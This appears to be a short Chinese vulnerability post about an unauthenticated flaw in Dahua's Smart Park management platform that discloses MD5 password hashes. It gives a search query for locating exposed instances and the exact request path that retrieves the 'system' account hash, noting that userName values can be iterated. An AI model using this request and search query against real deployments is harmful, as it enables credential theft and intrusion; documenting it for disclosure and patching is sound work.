大华智慧园区综合管理平台密码泄露漏洞
发布时间
阅读量:
阅读量
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,提供安防、能源管理、环境监测、人员管理、停车管理等一站式解决方案。由于未进行鉴权,直接获取了system的MD5加密密码。影响版本为大华智慧园区综合管理平台。漏洞复现可通过遍历userName参数获取md5加密的密码,具体代码为/admin/user_getUserInfoByUserName.action?userName=system,相关图片链接为[插入图片描述]。
一、漏洞简介
大华智慧园区综合管理平台是一个整合了智能化、信息化、网络化和安全化的综合管理平台,旨在为园区提供全方位的综合管理服务,主要涉及安防、能源管理、环境监测、人员管理和停车管理等多个方面。在缺乏身份验证的情况下,系统能够直接获取用户密码(采用MD5加密)。
二、影响版本
- 大华智慧园区综合管理平台
三、资产测绘
- hunter
app.name="Dahua 大华 智慧园区管理平台" - 登录页面
四、漏洞复现
/admin/user_getUserInfoByUserName.action?userName=system
可通过遍历userName参数,获取md5加密的密码,
全部评论 (0)
还没有任何评论哟~